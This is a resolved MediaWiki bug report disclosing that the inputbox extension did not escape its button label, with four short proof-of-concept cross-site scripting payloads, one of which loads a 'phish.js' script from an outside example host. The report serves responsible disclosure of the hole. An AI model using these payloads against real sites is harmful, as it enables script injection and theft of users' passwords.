Page MenuHomePhabricator

Insecure HTML can be added
Closed, ResolvedPublic

Description

Author: conrad.irwin

Description:
As this does no HTML escaping it is possible for editors to embed script tags in the page, with all of the security problems that that entails.

I found this problem on wiktionary and wikipedia, so I am guessing it is a universal problem.

For example...

<inputbox>
type=search
buttonlabel=Hello" onclick="alert('gotcha');return false
searchbuttonlabel=Dig deeper
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><!-- Actually this is quite useful...
searchbuttonlabel=Dig deeper--> <br class="
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript">document.body.innerHTML="You Smell";</script>
searchbuttonlabel=Oops
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript" src="http://www.example.com/phish.js" />
searchbuttonlabel=Now you are really for it
</inputbox>

This could have dire consequences, as it would be trivial to get people's wiki passwords (in the name of the unified login scheme) or other less obvious hacks.


Version: unspecified
Severity: critical

Details

Reference
bz11877

Event Timeline

bzimport raised the priority of this task from to Medium.Nov 21 2014, 10:00 PM
bzimport set Reference to bz11877.
bzimport added a subscriber: Unknown Object (MLST).